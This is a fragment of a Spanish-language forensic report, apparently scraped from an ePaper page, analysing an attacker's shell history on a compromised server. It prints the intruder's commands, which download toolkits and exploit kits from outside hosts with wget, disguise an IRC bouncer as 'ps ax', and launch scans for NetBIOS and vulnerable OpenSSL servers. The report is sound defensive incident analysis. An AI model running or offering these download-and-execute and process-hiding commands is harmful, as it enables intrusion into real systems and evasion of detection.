INFORME TÉCNICO – ANÁLISIS FORENSE
INFORME TÉCNICO – ANÁLISIS FORENSE
INFORME TÉCNICO – ANÁLISIS FORENSE
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
wget www.zetu.as.ro/psyz.tar.gztar xzvf psyz.tar.gzrm -rf psyz.tar.gzmv psybnc localcd localrm -rf psybnc.conf*wget www.zetu.as.ro/psybnc/psybnc.confmv psybnc "ps ax"export PATH=".""ps ax"cd var/tmpdirrm -rf woot.tgzdirwget www.zetu.as.ro/psybnc.tgztar xvfz psybnc.tgzcd psybnc./psybncwexitwps auxcd /var/tmplsdirwget http://www.plus.factory.home.ro/selena.tgztar xvfz selena.tgzcd selena./assl 217.172Lo primero que hace es descargar w00t.tgz que son una serie deutilidades. Después hace un escaneo de la red de la clase B 200.207buscando máquinas con el puerto de netbios abierto(139).Luego descargó e instaló el psyz, que es el psybnc con el nombrecambiado (un bouncer para conectar al IRC). Mas información enhttp://www.psybnc.info/Descargo un fichero llamado selena.tgz donde tiene una serie deexploits y utilidades, entre ellas un script llamado assl que lo utilizóbuscando más ordenadores con assl(escaner que buscar servidores apachecon OpenSSL vulnerable) en la red 217.172.